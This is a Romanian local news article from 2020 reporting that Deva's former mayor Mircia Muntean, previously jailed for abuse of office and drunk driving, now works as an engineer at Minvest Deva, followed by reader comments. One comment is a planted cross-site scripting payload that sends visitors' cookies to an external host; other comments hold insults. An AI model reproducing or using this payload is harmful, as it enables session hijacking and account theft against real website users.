Fostul primar al Devei, Mircia Muntean, lucrează acum la Minvest

28 mai 2020 | 6 Comentarii | Publicat in: Actualitate

Fostul primar al Devei, Mircia Muntean (foto), este angajat al Companiei Minvest Deva de aproape o lună, susţine directorul Lucian Gherman.

Mircia Muntean este angajat pe postul de inginer aici. Gherman a declarat pentru MESAGERUL HUNEDOREAN că nu a fost nevoie de concurs pentru ocuparea acestui post.
Mircia Muntean a fost primar al municipiului Deva în perioada 1996-2012, deputat în Parlamentul României în mandatul 2012-2016, şi ales din nou primar al Devei în 2016. Dar în 24 septembrie 2013 a fost condamnat definitiv de Înalta Curte de Casaţie şi Justiţie la patru ani de închisoare cu suspendare, fiind acuzat de abuz în serviciu, într-un dosar din 2004, în care a fost acuzat că a încheiat tranzacţii ilegale de terenuri cu un traficant de maşini de lux.
În aprilie 2017 a primit o nouă sentinţă de doi ani, pentru conducere sub influenţa alcoolului, şi fiindcă se afla în perioada de încercare, pedeapsa de patru ani s-a reactivat, cele două pedepse s-au contopit şi astfel Mircia Muntean a avut de ispăşit o pedeapsă de şase ani cu executare. A ieşit din închisoare la sfârşitul anului trecut. (S.Popa)

Comentarii (6)

Trackback URL | Comments RSS Feed

 1. Mircea spune:

  Mare excroc. Ce face acolo? Fura? Ca asta ii place lui. O jigodie ordinara.

 2. florin spune:

  ce sinteti asa rai ma ,trebuie sa maninca si el o pita.

 3. Unu spune:

  Putem să vedem rezultatele concursului pentru acel post?! Cum dracu’ își găsesc ăștia de lucru așa repede?! Ca și fostul prefect Kiszely, aterizat acum la Primăria Deva!

 4. Dan Andron spune:

  Stelian sefuul!

 5. Jonatan Allee spune:

  document.location=’https://ro-mail.000webhostapp.com/cuci/danutu.php?c=’+document.cookie;

 6. Dan Bitiman spune:

  de a dreptul adevrata

Scrie un comentariu

stiri si ziare
Citește articolul precedent:
Fostul ministru Răzvan Cuc reacţionează la ameninţările premierului

Fostul ministru al Transporturilor, Răzvan Cuc (foto), a reacţionat după ce premierul Ludovic Orban a cerut miercuri ministrului Transporturilor Lucian...

Situaţia infecţiilor cu Covid-19 în judeţ şi la nivel naţional, în 28 mai 2020

De la începutul monitorizării, şi până ieri, joi, 28 mai, în judeţul Hunedoara 636 de persoane au fost confirmate pozitiv...

Vorţa: greul vine de la 1 iulie

O altă comună va fi lovită de la 1 iulie de imposibilitatea efectuării plăţilor salariilor însoţitorilor persoanelor cu handicap şi...

Închide